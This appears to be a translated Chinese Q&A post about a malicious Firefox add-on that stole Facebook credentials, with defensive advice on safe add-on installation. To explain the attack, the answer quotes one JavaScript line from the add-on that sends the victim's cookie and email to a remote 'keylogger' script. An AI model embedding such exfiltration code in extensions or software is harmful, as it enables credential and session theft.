如何安全地使用Firefox插件来防止窃取数据？

Question

YouTube上的一些视频展示了火狐扩展如何收集登录信息，用于登录Facebook等网站。

在将此工具/恶意软件安装为Firefox插件后，我观察到我的浏览器使用Firebug的活动。我的用户名和密码是通过Ajax请求发送到服务器的。

我联系了作者。他说，他可以将这个脚本嵌入到任何Firefox插件中。

如何安全地使用Firefox插件？我安装了3种类型的防病毒和防火墙。但所有这些都无法检测到这个恶意软件。

Answer 1

你怎么保护自己

来自官方站点的Firefox插件通过addon审查过程https://addons.mozilla.org/en-US/developers/docs/policies/reviews。

因此，您可以检查一个插件是否是正式的，并在安装之前已经过检查。

由于给定的原因(病毒、木马等)，您可以找到Mozilla删除的阻止插件列表( https://addons.mozilla.org/en-US/firefox/blocked/ )。

从第三方安装一个插件更危险，因此您可能需要亲自检查源代码(这是可能的，因为它是javascript文件的压缩)或信任作者/提供者。

，恶意软件是如何工作的？

.xul文件包含以下代码行：

xhr.open("GET", 
      "http://www.removedurl.com/keylogger/snooper.php?
       facebook="+cookie+'&email='+email, true);

所以当你在你自己的帐户上测试这个脚本时，它会发送你的密码给他。由于这个原因，您应该删除这个插件并更改您的密码。